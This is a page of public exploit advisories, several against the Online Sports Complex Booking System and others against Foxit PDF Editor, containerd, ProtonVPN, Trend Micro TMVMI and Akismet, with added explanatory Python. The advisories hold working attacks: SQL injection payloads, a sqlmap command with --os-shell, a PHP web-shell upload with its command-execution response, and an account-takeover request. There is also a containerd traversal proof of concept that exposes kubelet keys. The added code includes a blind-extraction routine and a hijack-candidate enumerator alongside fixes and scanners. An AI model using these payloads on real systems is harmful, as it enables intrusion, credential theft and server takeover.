<pre><code># Title: Sports Complex Booking System 1.0 Blind SQLi to RCE<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /># Vulnerable code (PHP)<br /><br />```php<br />// view_facility.php: $_GET['id'] is interpolated straight into the query string.<br />// The `> 0` guard does not help: a payload that starts with a digit, such as 4' AND ..., still passes it.<br />if(isset($_GET['id']) && $_GET['id'] > 0){<br />    $qry = $conn->query("SELECT f.*, c.name as category from `facility_list` f inner join category_list c on f.category_id = c.id where f.id = '{$_GET['id']}' ");<br />    if($qry->num_rows > 0){<br />        foreach($qry->fetch_assoc() as $k => $v){<br />            $$k=stripslashes($v);<br />        }<br />    }<br />}<br />```<br /><br /># Status: CRITICAL<br /><br />```<br />Parameter: id (GET)<br />    Type: boolean-based blind<br />    Title: AND boolean-based blind - WHERE or HAVING clause<br />    Payload: p=view_facility&id=4' AND 1013=1013-- aQIm<br /><br />    Type: error-based<br />    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br />    Payload: p=view_facility&id=4' OR (SELECT 7626 FROM(SELECT COUNT(*),CONCAT(0x71716a7671,(SELECT (ELT(7626=7626,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SkTl<br /><br />    Type: time-based blind<br />    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br />    Payload: p=view_facility&id=4' AND (SELECT 5013 FROM (SELECT(SLEEP(5)))lCeY)-- pdUo<br />---<br />```<br /><br /># Blind time-based SQLi to RCE<br /># Exploit<br /><br />sqlmap -u 'http://0day.gov/scbs/?p=view_facility&id=4' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D scbs -T users --dump --os-shell<br /><br /># Description:<br />The time-based blind SQL injection in the id parameter could be escalated to remote code execution with sqlmap's --os-shell because of the privileges held by the database account the application connects with, so the bug also amounts to a privilege escalation. On MySQL, --os-shell works by writing a web shell with SELECT ... INTO OUTFILE, which needs the FILE privilege, a secure_file_priv setting that does not block the target directory, and a web-accessible directory the MySQL process can write to; without those the injection still yields the database contents (-D scbs -T users --dump) but not a shell.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/nY9GR9F.png<br /></code></pre>
<pre><code># Exploit Title: Trend Micro Virtual Mobile Infrastructure (TMVMI) version 6 - Denial of Service (PoC)<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.trendmicro.com/<br /># Software Link: App Store for iOS devices<br /># Version: 6.0.1278<br /># Tested: iPhone 6 iOS 12.4.7<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br /># Steps to Produce the Crash:<br />1- Run python code: TMVMI_6.py<br />2- Copy content to clipboard<br />3- Open TMVMI Client<br />4- Paste ClipBoard on "address"<br />5- Click Next<br />6- Crashed<br /><br /><br />------------------------- <br />TMVMI_6.py<br />-------------------------<br /><br />#!/usr/bin/env python<br /><br />buffer = "\x41" * 1500<br />print (buffer)<br /></code></pre>
<pre><code># Exploit Title: Foxit PDF Editor (iOS) - Arbitrary File Upload (Unauthenticated)<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.foxit.com<br /># Software Link: https://apps.apple.com/us/app/foxit-pdf-editor/id507040546<br /># Version: 11.3.1<br /># Tested: iPhone 6 iOS 12.4.7<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />- Description :<br /><br />An arbitrary file upload vulnerability has been discovered in the Foxit PDF Editor v11.3.1 iOS mobile application.<br />The Wi-Fi file-transfer feature starts a small web server on port 8888 that accepts uploads of any file type without authentication, so a remote attacker who can reach the device over the network can place arbitrary files in the app's document store.<br /><br />- Steps : <br /><br />1- Download and install the Foxit PDF Editor iOS application<br />2- Open the app and go to Files<br />3- Tap PC (file transfer over Wi-Fi)<br />4- Enable File Transferring<br />5- The "Index of Documents" page served at http://localhost:8888 accepts uploads with any file extension<br /><br /><br />- Request :<br /><br />POST / HTTP/1.1<br />Host: localhost:8888<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-us<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryC2M8Dmj739BtPV2n<br />Origin: http://localhost:8888<br />User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/604.1<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Referer: http://localhost:8888/<br />Content-Length: 304<br /><br />------WebKitFormBoundaryC2M8Dmj739BtPV2n<br />Content-Disposition: form-data; name="button"; filename="s3od.php"<br />Content-Type: application/octet-stream<br /><br />0xSaudi<br />------WebKitFormBoundaryC2M8Dmj739BtPV2n<br />Content-Disposition: form-data; name="button"<br /><br />Upload<br />------WebKitFormBoundaryC2M8Dmj739BtPV2n--<br /><br /><br />****************************<br /><br />Path File : http://localhost:8888/s3od.php<br /><br />****************************<br /></code></pre>
<pre><code># Title: Sports Complex Booking System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 24.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />A registered user can upload a .php (or .php.png) file through the profile-image field of the Manage Account page by intercepting the multipart request in Burp Suite and editing the raw request: the part's Content-Type is set to image/png while the filename keeps its .php extension. The file is stored under /scbs/dist/img/ with its original name and is executed by the server when requested.<br /><br /># Vulnerable code (PHP)<br />The upload is not filtered on the server side. The only code that looks at the chosen file is this client-side preview script, which reads the file with FileReader to display it and never checks its type; a client-side check of this kind is bypassed simply by editing the request.<br /><br />```php<br />window.displayImg = function(input,_this) {<br />    if (input.files && input.files[0]) {<br />        var reader = new FileReader();<br />        reader.onload = function (e) {<br />            $('#cimg').attr('src', e.target.result);<br />            _this.siblings('.custom-file-label').html(input.files[0].name)<br />        }<br /><br />        reader.readAsDataURL(input.files[0]);<br />    }else{<br />        $('#cimg').attr('src', "<?php echo validate_image(isset($image_path) ? $image_path : "") ?>");<br />        _this.siblings('.custom-file-label').html("Choose file")<br />    }<br />}<br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /scbs/?p=manage_account HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738<br />Content-Length: 882<br />Origin: https://0day.gov<br />Referer: https://0day.gov/scbs/<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productName"<br />Hejap Zairy<br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="submit"<br />-----------------------------409902128312379197203124536738--<br />```<br /><br /><br /># Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /scbs/dist/img/0day_hejap.php?515=echo%200day%20hejap%20Zairy HTTP/1.1<br />Host: 0day.gov<br />Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Upgrade-Insecure-Requests: 1<br />Te: trailers<br />Connection: close<br />```<br /><br /># Response<br />```<br />HTTP/1.1 200 OK<br />Date: Sun, 20 Mar 2022 08:04:28 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 17<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />0day hejap Zairy<br />```<br /><br /><br /># Description:<br />Because the server keeps the uploaded file's client-supplied name and extension and stores it in a web-served directory, the attacker's PHP file runs when it is requested. The GET request above passes the command echo 0day hejap Zairy through the 515 parameter to the backtick operator in the uploaded script, and the response body is the command's output. An upload feature that accepts executable script files gives direct command execution on the server and needs almost no technical skill to exploit.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/us3lA1l.png<br /></code></pre>
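The request above succeeds because the server trusts the client-supplied filename and Content-Type and stores the file where Apache executes it. The block below is an added example, not code from the advisory or from the application, of the server-side check that is missing: it ignores the declared Content-Type, identifies the image format from the file's magic bytes, flags script extensions anywhere in the client's filename (which catches the .php.png double extension too), and chooses the stored file name itself. The sample parts are constructed from the advisory's request plus a minimal PNG header; the extension list and the magic-byte table are assumptions for the example.

```python
import secrets

# Image formats accepted, identified by their leading bytes (not by the client's
# Content-Type, which the advisory's request simply sets to image/png).
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Extensions a PHP handler may execute. With Apache mod_mime multiple
# extensions (AddHandler), "shell.php.png" can still run as PHP, which is why
# every segment of the filename is checked, not only the last one.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def sniff_image_format(data: bytes):
    """Return 'png', 'jpg' or 'gif' from the magic bytes, or None."""
    for fmt, magic in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def has_script_extension(filename: str) -> bool:
    """True if any extension segment after the first dot is executable."""
    segments = filename.lower().split(".")[1:]
    return any(seg in SCRIPT_EXTENSIONS for seg in segments)


def validate_upload(filename: str, declared_content_type: str, data: bytes):
    """Decide whether a profile-image part may be stored.
    Returns (ok, stored_name_or_reason). `declared_content_type` is taken as a
    parameter only to make the point that it is never consulted."""
    if has_script_extension(filename):
        return False, "script extension in client filename"
    fmt = sniff_image_format(data)
    if fmt is None:
        return False, "body is not a PNG, JPEG or GIF"
    # The server picks the name: random, with the extension derived from the
    # sniffed format, so nothing from the client reaches the filesystem path.
    return True, f"{secrets.token_hex(16)}.{fmt}"


# Constructed samples: the advisory's upload part, plus variants.
ADVISORY_PART = ("0day_hejap.php", "image/png", b"<?=`$_GET[515]`?>")
DOUBLE_EXT_PART = ("shell.php.png", "image/png", IMAGE_MAGIC["png"] + b"\x00" * 16)
REAL_PNG_PART = ("photo.png", "image/png", IMAGE_MAGIC["png"] + b"\x00\x00\x00\rIHDR")
# Polyglot: valid PNG signature with PHP appended. It passes the magic check, so
# the server-chosen name and a non-executing upload directory are what keep it inert.
POLYGLOT_PART = ("avatar.png", "image/png", IMAGE_MAGIC["png"] + b"<?php system($_GET['c']); ?>")


def demo():
    return {name: validate_upload(name, ctype, body)
            for name, ctype, body in (ADVISORY_PART, DOUBLE_EXT_PART, REAL_PNG_PART, POLYGLOT_PART)}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The polyglot case is the reason the check alone is not enough: a file that starts with a valid PNG header and carries PHP after it passes sniffing, so the upload directory must also be configured not to execute scripts, and the stored name must never come from the client.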
<pre><code># Exploit Title: Online Sports Complex Booking System - 'id' Blind SQL Injection<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /><br /># Vulnerable Code<br /><br />line 3 in file "/scbs/view_facility.php"<br /><br />$qry = $conn->query("SELECT f.*, c.name as category from `facility_list` f inner join category_list c on f.category_id = c.id where f.id = '{$_GET['id']}' ");<br /><br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/scbs/?p=view_facility&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: p=view_facility&id=1' AND 9877=9877 AND 'MVfb'='MVfb<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: p=view_facility&id=1' AND (SELECT 8456 FROM (SELECT(SLEEP(5)))ZnUC) AND 'GiOo'='GiOo<br /><br /></code></pre>
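The two Sports Complex Booking System SQL injection advisories on this page (the blind-SQLi-to-RCE one above and this one) come down to the same line in view_facility.php. The following is an added example, not code from either advisory or from the application: it reproduces the vulnerable query construction against a constructed in-memory SQLite database (table and column names borrowed from the advisories; the password value is made up), extracts a value character by character with the boolean-based blind technique sqlmap reported, and shows the parameterised form that stops it. SQLite stands in for MySQL, and the payload shape `4' AND ... AND 'a'='a` is the one from the sqlmap output.

```python
import sqlite3
import string

# Constructed stand-in for the scbs database (names from the advisories, the
# password value is made up). Not the application's real schema or data.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE facility_list (id INTEGER, name TEXT, category_id INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO facility_list VALUES (4, 'Court A', 1)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'p4ssw0rd_2022')")
    return conn


def view_facility_vulnerable(conn, id_param):
    """Same construction as view_facility.php: the raw id is interpolated inside
    the quotes. Returns True when the page would render (num_rows > 0). The PHP
    `$_GET['id'] > 0` guard is not modelled; a payload starting with a digit
    passes it anyway."""
    sql = f"SELECT f.* FROM facility_list f WHERE f.id = '{id_param}'"
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False  # a syntax error renders like "no rows": still a usable oracle


def view_facility_fixed(conn, id_param):
    """Parameterised form: the value is bound by the driver and never parsed as SQL."""
    rows = conn.execute("SELECT f.* FROM facility_list f WHERE f.id = ?", (id_param,)).fetchall()
    return len(rows) > 0


# Characters tried per position. On MySQL compare with BINARY (or ASCII()) so the
# default case-insensitive collation does not merge 'a' and 'A'.
CHARSET = string.ascii_lowercase + string.digits + "_"


def extract_blind(oracle, subquery, max_len=64):
    """Boolean-based blind extraction: one yes/no question per candidate
    character. `oracle(payload)` returns the page-renders signal for a given id
    value. Returns (value, number_of_requests)."""
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        found = None
        for ch in CHARSET:
            payload = f"4' AND substr(({subquery}),{pos},1)='{ch}' AND 'a'='a"
            requests += 1
            if oracle(payload):
                found = ch
                break
        if found is None:  # substr() past the end matches nothing: done
            break
        value += found
    return value, requests


def demo():
    conn = build_db()
    oracle = lambda payload: view_facility_vulnerable(conn, payload)
    secret, requests = extract_blind(oracle, "SELECT password FROM users WHERE username='admin'")
    return {
        "oracle_true": oracle("4' AND 1013=1013-- x"),   # sqlmap's boolean probe
        "oracle_false": oracle("4' AND 1013=1014-- x"),
        "secret": secret,
        "requests": requests,
        "fixed_legit": view_facility_fixed(conn, "4"),
        "fixed_attack": view_facility_fixed(conn, "4' AND 1013=1013-- x"),
    }


if __name__ == "__main__":
    print(demo())
```

The time-based variant sqlmap also found works the same way, except that the oracle measures response delay from a SLEEP() instead of checking whether the facility page rendered; that is why the RCE advisory above needs a long --time-sec on a slow target.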
<pre><code># Exploit Title: Online Sports Complex Booking System - Account Takeover (Unauthenticated)<br /># Date: 24/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /><br /><br /># Description :<br /><br />Online Sports Complex Booking System is vulnerable to unauthenticated account takeover.<br />The user-save endpoint /scbs/classes/Users.php?f=save does not verify that the caller is logged in or is allowed to edit the targeted account, so an attacker can overwrite any registered Staff account by sending the POST request below with the victim's "id" and attacker-chosen "firstname", "lastname", "username", "password" and "type" values (the request below targets id 1).<br /><br /># Steps to Reproduce :<br /><br />1. Send the POST request below, changing the "id", "firstname", "lastname", "username" and "password" parameters to the target account and the desired credentials.<br /><br />2. Go to http://localhost/scbs/admin/ and log in with the new username and password.<br /><br /><br />======<br /><br />POST /scbs/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------11619114222641896828949561514<br />Content-Length: 811<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/scbs/admin/?page=user<br />Cookie: PHPSESSID=2knksvuc4mgojfd9enhccg08sn<br /><br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="firstname"<br /><br />Adminstrator<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="lastname"<br /><br />Admin<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="username"<br /><br />admin<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="password"<br /><br />admin<br />-----------------------------11619114222641896828949561514<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------11619114222641896828949561514--<br /></code></pre>
<pre><code>containerd: Insecure handling of image volumes<br /><br />containerd's cri plugin handles image volumes containing path traversals insecurely. This can be used to copy arbitrary host directories to a container-mounted path.<br /><br />OCI images contain a JSON config file described in https://github.com/opencontainers/image-spec/blob/main/config.md. As part of this config, an image can specify "Volumes" which describe 'where the process is likely to write data specific to a container instance' when the image is used to run a container.<br /><br />When this configuration is converted into an OCI runtime config, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md:<br /><br />"Implementations SHOULD provide mounts for these locations such that application data is not written to the container's root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location"<br /><br />The seeding is implemented in (*criService).CreateContainer (cri/server/container_create.go):<br /><br />var volumeMounts []*runtime.Mount<br />if !c.config.IgnoreImageDefinedVolumes {<br />    // Create container image volumes mounts.<br />    volumeMounts = c.volumeMounts(containerRootDir, config.GetMounts(), &image.ImageSpec.Config)<br />} else if len(image.ImageSpec.Config.Volumes) != 0 {<br />    ....<br />}<br /><br />func (c *criService) volumeMounts(..) .. {<br />    var mounts []*runtime.Mount<br />    ...<br />    for dst := range config.Volumes {<br />        ...<br />        volumeID := util.GenerateID()<br />        src := filepath.Join(containerRootDir, "volumes", volumeID)<br />        mounts = append(mounts, &runtime.Mount{<br />            ContainerPath:  dst,<br />            HostPath:       src,<br />            SelinuxRelabel: true,<br />        })<br />    }<br />    return mounts<br />}<br /><br />Image volume mounts are only supported if IgnoreImageDefinedVolumes is false. While the description mentions that this flag is "Useful for better resource isolation, security..." the default is false and none of the major containerd users seem to override it.<br /><br />So in the default config, c.volumeMounts will be called to create new runtime.Mount entries for all Volumes listed in the image config. There is no validation of the listed paths, and the .ContainerPath attribute is completely image/attacker controlled.<br /><br />Later in the execution, the harmless HostPaths and the attacker-controlled ContainerPaths are passed to the customopts.WithVolumes method. While the HostPath is cleaned, ContainerPath is passed through without changes:<br /><br />if len(volumeMounts) > 0 {<br />    mountMap := make(map[string]string)<br />    for _, v := range volumeMounts {<br />        mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath<br />    }<br />    opts = append(opts, customopts.WithVolumes(mountMap))<br />}<br /><br />The WithVolumes function (pkg/cri/opts/container.go) now tries to copy all files that are under ContainerPath in the container rootfs to the temporary directory at HostPath, which will later be mounted into the container at the same location (this is the optional "seeding" step described in the spec):<br /><br />for host, volume := range volumeMounts {<br />    // The volume may have been defined with a C: prefix, which we can't use here.<br />    volume = strings.TrimPrefix(volume, "C:")<br />    for _, mountPath := range mountPaths {<br />        src := filepath.Join(mountPath, volume)<br />        if _, err := os.Stat(src); err != nil {<br />            if os.IsNotExist(err) {<br />                // Skip copying directory if it does not exist.<br />                continue<br />            }<br />            ...<br />        }<br />        ...<br />        if err := copyExistingContents(src, host); err != nil {<br />            ...<br />        }<br />    }<br />}<br /><br />volume is the fully attacker-controlled ContainerPath; mountPath is a host directory pointing to a part of the container's rootfs. filepath.Join concatenates its arguments and then Cleans the result, so by setting volume to a path like "/../../../../../../../../../etc", src becomes "/etc" on the host, and the copyExistingContents call in the last line recursively copies the host's /etc directory to host. As the directory specified by host will later be mounted into the container, this gives the container full read access to arbitrary host files and directories.<br /><br />Suggested Fix:<br /><br />mountMap[filepath.Clean(v.HostPath)] = filepath.Clean(v.ContainerPath)<br /><br />should be sufficient to fix the issue: Clean resolves the leading ".." components against "/" before the path is joined to the rootfs directory, so the cleaned path can no longer escape it. (But it might be reasonable to surface/log misbehaving images?)<br /><br />Proof-of-Concept:<br /><br />fwilhelm ~ % buildah inspect volumes-test | jq '.OCIv1.config.Volumes'<br />{<br />  "/../../../../../../../../var/lib/kubelet/pki/": {}<br />}<br />fwilhelm ~ % kubectl run shell --rm -i --tty --image europe-west3-docker.pkg.dev/[redacted]/test/volumes-test -- /bin/sh<br />/ # mount | grep /var/lib/kubelet<br />/dev/root on /var/lib/kubelet/pki type ext4 (rw,relatime)<br />/ # ls -la /var/lib/kubelet/pki/<br />total 20<br />drwxrwxrwt 2 root root 4096 Nov 12 15:54 .<br />drwxr-xr-x 3 root root 4096 Nov 12 15:54 ..<br />-rw-r--r-- 1 root root 1135 Nov 4 08:59 kubelet-client.crt<br />-rw------- 1 root root 227 Nov 4 08:59 kubelet-client.key<br />-rw------- 1 root root 0 Nov 4 08:59 kubelet-client.lock<br />-rw------- 1 root root 1496 Nov 4 08:59 kubelet-server-2021-11-04-08-59-06.pem<br />lrwxrwxrwx 1 root root 59 Nov 4 08:59 kubelet-server-current.pem -> /var/lib/kubelet/pki/kubelet-server-2021-11-04-08-59-06.pem<br /><br />Let me know if you need access to the POC image, I did not want to spam the full list with it.<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-02-21. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2022-23648.<br /><br /><br /><br />Found by: fwilhelm@google.com<br /><br /></code></pre>
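To make the traversal concrete, the following is an added example, not containerd code and not the reporter's proof of concept: it emulates Go's filepath.Join (concatenate, then Clean) with posixpath so the vulnerable and the fixed computation of src can be compared offline, and adds a small scanner for image configs that flags Volumes keys whose cleaned form differs from what was declared. The rootfs path is a constructed assumption (the real location depends on the snapshotter); the volume key is the one from the proof of concept above.

```python
import posixpath


def go_filepath_join(*elems: str) -> str:
    """Emulates Go's filepath.Join on POSIX: join the non-empty elements with '/'
    and Clean the result. posixpath.join must not be used here, because it
    discards everything left of an absolute element, which is not what Go does."""
    return posixpath.normpath("/".join(e for e in elems if e))


def seed_source_vulnerable(mount_path: str, container_path: str) -> str:
    """WithVolumes as reported: src := filepath.Join(mountPath, volume), with
    volume taken from the image config unchanged."""
    return go_filepath_join(mount_path, container_path)


def seed_source_fixed(mount_path: str, container_path: str) -> str:
    """With the suggested fix applied: ContainerPath is Cleaned first, so leading
    '..' components resolve against '/' of the container rather than against the
    host directory that holds the rootfs."""
    return go_filepath_join(mount_path, posixpath.normpath(container_path))


def is_inside(root: str, path: str) -> bool:
    """True if `path` is `root` itself or lies below it (both already cleaned)."""
    root = posixpath.normpath(root)
    return path == root or path.startswith(root + "/")


def suspicious_volumes(volumes: dict) -> list:
    """Scanner for an image config's Volumes map: report keys that are not
    absolute or whose Cleaned form differs from the declared one ('..' or '.'
    components, doubled slashes). A trailing slash alone is not reported."""
    bad = []
    for key in volumes:
        cleaned = posixpath.normpath(key)
        declared = key.rstrip("/") or "/"
        if not key.startswith("/") or cleaned != declared:
            bad.append(key)
    return bad


# Constructed host directory holding one snapshot of the container rootfs
# (an assumption for the example; the real path depends on the snapshotter).
ROOTFS = "/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/42/fs"
# Volume key from the report's proof-of-concept image.
POC_VOLUME = "/../../../../../../../../var/lib/kubelet/pki/"


def demo():
    return {
        "vulnerable_src": seed_source_vulnerable(ROOTFS, POC_VOLUME),
        "fixed_src": seed_source_fixed(ROOTFS, POC_VOLUME),
        "flagged": suspicious_volumes({POC_VOLUME: {}, "/data": {}, "/var/log/": {}}),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The scanner can be run over the output of `buildah inspect` or `docker image inspect` before an image is admitted to a cluster; with the fix in place the traversal is harmless, but an image that declares such a volume is still worth rejecting or logging, as the report suggests.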
<pre><code># Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path<br /># Date: 22/03/2022<br /># Exploit Author: gemreda (@gemredax)<br /># Vendor Homepage: https://protonvpn.com/<br /># Software Link: https://protonvpn.com/<br /># Version: 1.26.0<br /># Tested: Windows 10 x64<br /># Contact: gemredax@pm.me<br /><br />PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ProtonVPN Wireguard<br />        TYPE               : 10  WIN32_OWN_PROCESS<br />        START_TYPE         : 3   DEMAND_START<br />        ERROR_CONTROL      : 1   NORMAL<br />        BINARY_PATH_NAME   : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf<br />        LOAD_ORDER_GROUP   :<br />        TAG                : 0<br />        DISPLAY_NAME       : ProtonVPN WireGuard<br />        DEPENDENCIES       : Nsi<br />                           : TcpIp<br />        SERVICE_START_NAME : LocalSystem<br /><br /><br /># Exploit:<br /><br />The service's BINARY_PATH_NAME is not quoted and contains spaces. When the Service Control Manager starts it through CreateProcess, Windows resolves the unquoted path by trying each space-delimited prefix in turn, so a file such as "C:\Program.exe" or "C:\Program Files (x86)\Proton.exe" would be executed instead of the real binary. Because the service runs as LocalSystem (SERVICE_START_NAME above), a planted file runs as SYSTEM when the service starts. Exploitation requires write access to one of those intermediate locations; on a default Windows install standard users cannot create files in the root of C:\ or under Program Files, so check the ACLs of those directories (for example with icacls) before treating this as a working privilege escalation.<br /><br /></code></pre>
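The search the description refers to is CreateProcess's handling of an unquoted command line: it tries the path cut at each space in turn, appending .exe when the candidate has no extension, until one exists. The block below is an added example, not part of the advisory: it derives those candidates from the BINARY_PATH_NAME shown above so that each candidate's parent directory can then be checked for write access (for instance with icacls on the target). The path string is the one from the sc.exe output; the function is general and works for any unquoted service path, which is an intentional extension of the page's single case.

```python
import ntpath


def hijack_candidates(binary_path_name: str):
    """Given a service command line, return (candidates, intended_image): the
    files Windows would try before reaching the real executable, in the order
    CreateProcess tries them. Each candidate is a prefix of the command line cut
    at a space, with .exe appended when its last component has no extension.
    A quoted path yields no candidates."""
    if binary_path_name.startswith('"'):
        return [], binary_path_name.split('"')[1]
    tokens = binary_path_name.split(" ")
    candidates = []
    for n in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:n])
        if "." in ntpath.basename(prefix):
            return candidates, prefix  # has an extension: this is the intended image
        candidates.append(prefix + ".exe")
    # Ran out of tokens without finding an extension: the last try is the image
    return candidates[:-1], candidates[-1]


def directories_to_check(candidates):
    """Directories whose ACLs decide exploitability, one per candidate, without
    duplicates. This only names them; inspect them on the host with icacls."""
    return list(dict.fromkeys(ntpath.dirname(c) for c in candidates))


# From the sc.exe qc output in the advisory.
PROTONVPN_PATH = (r"C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe "
                  r"C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf")


if __name__ == "__main__":
    cands, image = hijack_candidates(PROTONVPN_PATH)
    print("intended image:", image)
    for c in cands:
        print("candidate:", c)
    print("check ACLs on:", directories_to_check(cands))
```

The fix on the vendor side is to register the service with the executable path in quotes, which is what the first branch of the function models: with a quoted path there is nothing left to hijack.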
<pre><code># Exploit Title: WordPress Plugin Akismet Spam Protection v4.2.2 - Cross Site Scripting (XSS)<br /># Date: 2022-03-22<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/akismet<br /># Version: 4.2.2<br /># Tested on: Windows 11<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates an Akismet Spam Protection from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://localhost/akismet/akismet.php?id=<script>alert("test")</script><br /></code></pre>
